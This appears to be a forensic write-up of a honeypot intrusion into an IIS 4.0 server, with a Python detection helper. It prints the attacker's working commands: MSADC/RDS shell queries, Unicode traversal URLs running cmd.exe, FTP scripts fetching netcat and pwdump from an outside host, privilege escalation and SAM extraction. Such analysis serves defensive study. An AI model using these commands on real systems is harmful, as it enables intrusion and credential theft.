Tools Used to Analyze

Which exploits were used to attack the system?

How were the exploits used to access and control the system?

What was done once access was gained?
Note: The hacker made several typing errors, which produced redundant and syntactically incorrect commands; those are, hopefully, left out of this analysis. The main problem I saw was trying to get the correct case for the Unicode exploits, which turned out to be lowercase (../..%c0%af../..). Using *NIX vs. DOS commands also added to this problem.

Most likely used MSADC.PL

GET /msadc/msadcs.dll HTTP/1.0                                ---> Is the target vulnerable?
    (HTTP/1.0 is used here for the GET and 1.1 for the POST, as in msadc.pl; the attacker also uses 1.1 in his/her GET commands.)
HTTP/1.1 200 OK
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1    ---> Is RDS available/working?
User-Agent: ACTIVEDATA
                                                              ---> Yes!
Test RDS by creating a file called fun and placing the text werd in it.
(The RDS query strings in this analysis are shown collapsed to readable form; in the capture they appear with a space between every letter.)
Select * from Customers where City='|shell("cmd /c echo werd >> c:\fun")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
GET /guest/default.asp/..À¯../..À¯../..À¯../fun HTTP/1.1          ---> view the fun file
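The two request patterns documented above (the MSADC probe and RDS POST carrying a |shell("...")| command, and the overlong-UTF-8 traversal that the note about %c0%af case refers to) are what a defender would want to pick out of a web log or packet capture. The Python triage helper below is an added example, not part of the original analysis or of msadc.pl: the function names (normalize_overlong, escapes_root, extract_rds_shell, classify, triage) are my own, the sample requests are constructed from the request shapes shown in this write-up, and the decoder tries UTF-16LE first on the assumption that RDS carries the query as 16-bit characters (the likely reason the raw capture shows a space between letters), then falls back to single-byte text. It generalizes slightly beyond the page: it decodes any overlong two-byte sequence, not just %c0%af, is case-insensitive, and also flags plain ../ traversal like the cmd1.exe requests later in this analysis.

```python
"""Triage of the two request patterns in this write-up: the IIS Unicode
(overlong UTF-8) directory traversal and the MSADC/RDS
AdvancedDataFactory.Query POST carrying a |shell("...")| command.
Added example, not part of the original analysis; the sample requests at
the bottom are constructed from the request shapes shown in the write-up."""
import re
import urllib.parse
from typing import Optional, Tuple

RDS_PATH = "/msadc/msadcs.dll/AdvancedDataFactory.Query"
SHELL_RE = re.compile(r'\|shell\("([^"]*)"\)\|')


def normalize_overlong(path: str) -> Tuple[str, bool]:
    """Percent-decode PATH the way the vulnerable IIS decoder did.

    A two-byte UTF-8 sequence with lead byte 0xC0 or 0xC1 can only encode an
    ASCII value (0x00-0x7F) and is therefore 'overlong'; strict decoders reject
    it, but IIS mapped %c0%af back to '/' and %c1%9c back to '\\'.  Decoding is
    case-insensitive on purpose: detection must not depend on the case the
    attacker happened to type.  Returns (normalized path, overlong seen)."""
    raw = urllib.parse.unquote_to_bytes(path)
    out, seen, i = bytearray(), False, 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((lead & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            seen = True
            i += 2
        else:
            out.append(lead)
            i += 1
    return out.decode("latin-1"), seen


def escapes_root(path: str) -> bool:
    """True when the '..' segments in PATH climb above the web root."""
    depth = 0
    for seg in re.split(r"[\\/]+", path):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def extract_rds_shell(body: bytes) -> Optional[str]:
    """Return the command inside |shell("...")| from an RDS query body.
    Assumes the query travels as 16-bit characters (each ASCII byte followed
    by a null); tries that first, then plain single-byte text."""
    for encoding in ("utf-16-le", "latin-1"):
        try:
            text = body.decode(encoding)
        except UnicodeDecodeError:
            continue
        match = SHELL_RE.search(text)
        if match:
            return match.group(1)
    return None


def classify(method: str, target: str, body: bytes = b"") -> Optional[dict]:
    """Classify one request; None means nothing from this write-up matches."""
    path, _, query = target.partition("?")
    norm, overlong = normalize_overlong(path)
    if overlong or escapes_root(norm):
        return {"kind": "directory traversal", "path": norm, "overlong": overlong,
                "command": urllib.parse.unquote_plus(query) or None}
    if method == "POST" and path.startswith(RDS_PATH):
        return {"kind": "rds query", "path": path, "overlong": False,
                "command": extract_rds_shell(body)}
    if path.lower().startswith("/msadc/msadcs.dll"):
        return {"kind": "msadc probe", "path": path, "overlong": False, "command": None}
    return None


# Constructed sample traffic modelled on the requests in the write-up.
RDS_QUERY = ("Select * from Customers where City='|shell(\"cmd /c echo werd >> c:\\fun\")|' "
             "driver={Microsoft Access Driver (*.mdb)};"
             "dbq=c:\\winnt\\help\\iis\\htm\\tutorial\\btcustmr.mdb;")
SAMPLE_REQUESTS = [
    ("GET", "/msadc/msadcs.dll", b""),
    ("POST", RDS_PATH, RDS_QUERY.encode("utf-16-le")),
    ("GET", "/guest/default.asp/..%c0%af../..%c0%af../..%c0%af../fun", b""),
    ("GET", "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe"
            "?/c+copy+C:\\winnt\\system32\\cmd.exe+cmd1.exe", b""),
    ("GET", "/msadc/../../../../../../program files/common files/system/msadc/cmd1.exe"
            "?/c+ftp+-s:ftpcom", b""),
    ("GET", "/default.htm", b""),
]


def triage(requests=SAMPLE_REQUESTS):
    """Return the non-None classifications, in request order."""
    return [hit for hit in (classify(*req) for req in requests) if hit]


if __name__ == "__main__":
    for hit in triage():
        print(f"{hit['kind']:20} {hit['path']}  ->  {hit['command']}")
```

Running the block prints one line per suspicious request with the normalized path and the recovered command; the plain /default.htm request produces nothing. Normalizing before matching is the point: a signature on the literal string %c0%af misses %C0%AF and the other overlong forms, while the decoded path shows directly whether it left the web root.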
Copy Some Server Files

Move CMD.EXE
GET /msadc/..À¯../..À¯../..À¯../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+cmd1.exe HTTP/1.1
    ---> Copy cmd.exe to the directory the hacker will be working from.

Rename Default.htm
copy default.htm default.html
    ---> Upload own version of default.htm later.

Re-write default.htm file ??? Usually some type of defacement would occur here.
echo . >>default.htm
    ---> Attempt to overwrite the default.htm file with a "."? It did not work because the hacker used the append operator. The default.htm page was viewed by a visitor from 213.46.45.28 (GET with HTTP/1.0) just as the echo command was being called, and the visitor got the current page. The attacker then issued a GET / with HTTP/1.1, and the result was the same except that the "." was added after the </HTML> tag, which had no effect on the page.
Need some Hacking tools

Attacker successfully placed 3 files on the server from his/her FTP site:
  pdump.exe   --- I assume this is pwdump.exe because of the samdump.dll file that was also uploaded. The directory listing shows 32,768 bytes, which is the size of pwdump2 (actually the second version of pwdump2, which uses a new API call so the user does not need to pass the lsass.exe PID).
  Netcat.exe  --- Port redirector.
  Samdump.dll --- DLL for injection from pwdump.exe.
The hacker had to try several times to compose correct FTP command strings via echo commands redirected to a file. The ftpcom command file was created through a series of echo commands and then handed to the FTP program for automated execution.
Using ftp with the -s:filename option executes the commands in the file, allowing for easy FTP access.
Upload/Download of files via FTP

Uploaded Netcat.exe, Pdump.exe, and Samdump.dll to the web server.

FTP execution string via RDS:
Select * from Customers where City='|shell("cmd /c ftp -s:ftpcom -n www.nether.net")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
220 freenet.nether.net FTP server (SunOS 5.7) ready.
    ---> FTP attempt to this site did not work using the ftpcom file; incorrect login. Attacker tried several RDS query strings without success.

Working FTP execution strings:
GET /msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1
220-Serv-U FTP-Server v2.5h for WinSock ready...
220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,71
200 PORT Command successful.
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
150 Opening ASCII mode data connection for pdump.exe (32768 bytes).
150 Opening ASCII mode data connection for samdump.dll (36864 bytes).
226 Transfer complete.                  ---> one per transfer; the repeats are omitted
221 Buh bye, you secksi hax0r j00

Downloaded Whisker.tar.gz to the attacker's FTP site:
GET /msadc/../../../../../../program files/common files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1
220-Serv-U FTP-Server v2.5h for WinSock ready...
220--------H-A-C-K T-H-E P-L-A-N-E-T--------
220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r.
220-Featuring 100% elite hax0r warez!@$#@
220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram.
220 -------H-A-C-K T-H-E P-L-A-N-E-T--------
USER johna2k
331 User name okay, need password.
PASS haxedj00
230 User logged in, proceed.
PORT 172,16,1,106,12,87
200 PORT Command successful.
STOR whisker.tar.gz
150 Opening ASCII mode data connection for whisker.tar.gz.
226 Transfer complete.
221 Buh bye, you secksi hax0r j00
Tried to enumerate users and passwords with Password Dump (pdump.exe)

Using the RDS exploit, embedded the following command in a query string: pdump.exe >> c:\yay.txt
Select * from Customers where City='|shell("cmd /c C:\Program Files\Common Files\system\msadc\pdump.exe >> c:\yay.txt")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
c:\dir              ---> did it work? Volume in drive C has no label.
c:\cat yay          ---> not a *NIX box; need to use the DOS TYPE command
c:\type yay         ---> need .txt
Executed the NET USER command to list user accounts on the server from the command line.
Ran an RDS query to store NET SESSION output in the text file yay2.txt.
02/04/01 06:46a 38 yay2.txt           ---> 38 bytes - size of the standard "no entries" message
type yay2.txt       -- resulted in no entries in the list
c:\del yay2.txt     -- attempt to delete the yay2 file
Ran command-line net session into yay3.txt   ---> access denied; current rights will not allow execution, need to use RDS.
del yay3.txt        -- attempt to delete the yay3 file
Enumerate users on the server via the NET USERS command and RDS.
Select * from Customers where City='|shell("cmd /c net users >> heh.txt")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
type heh.txt
Attacker now knows what accounts are on the system.
Hacker tries adding the IIS default accounts to the admin group

NET GROUP command: tried several times with the wrong syntax. Why the IWAM account???
Select * from Customers where City='|shell("cmd /c net localgroup Domain Admins IUSR_KENNY /ADD")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
IUSR account!!!
Select * from Customers where City='|shell("cmd /c net localgroup administrators IUSR_KENNY /ADD")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
NET LOCALGROUP - Command used to show users in groups. Was the hacker successful? Yes:
Alias name     administrators

Time to try enumerating users and passwords from the SAM

type sam._
Select * from Customers where City='|shell("cmd /c rdisk -s")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
Select * from Customers where City='|shell("cmd /c rdisk")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
    ---> Quit trying to create a repair disk on the local drive -- $$hive$$.tmp is now over 3MB
Select * from Customers where City='|shell("cmd /c type c:\winnt\repair\sam._ >> c:\har.txt")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
Volume in drive C has no label.
Executed the command type har.txt; it was an actual SAM file. The ASCII text contained the standard MSFC code at the beginning of the file.
Copied har.txt to c:\inetpub\wwwroot.
Executed GET har.txt HTTP/1.1        -- easy way to copy the file to the hacker's machine and run a crack program against it.
Server: Microsoft-IIS/4.0
Tried to delete the file har.txt. No success through the exploited command line.
Select * from Customers where City='|shell("cmd /c del c:\inetpub\wwwroot\har.txt")|' driver={Microsoft Access Driver (*.mdb)};dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb;
Install NetCat (NC.exe)

Miscellaneous Events

How could this attack have been prevented?

How much time did you spend on this analysis and write-up?
15-20 hours

Do you feel the attacker in question knew if this was a honeypot?
Yes; the attacker issued the command: echo best honeypot i've seen till now :) > rfp.txt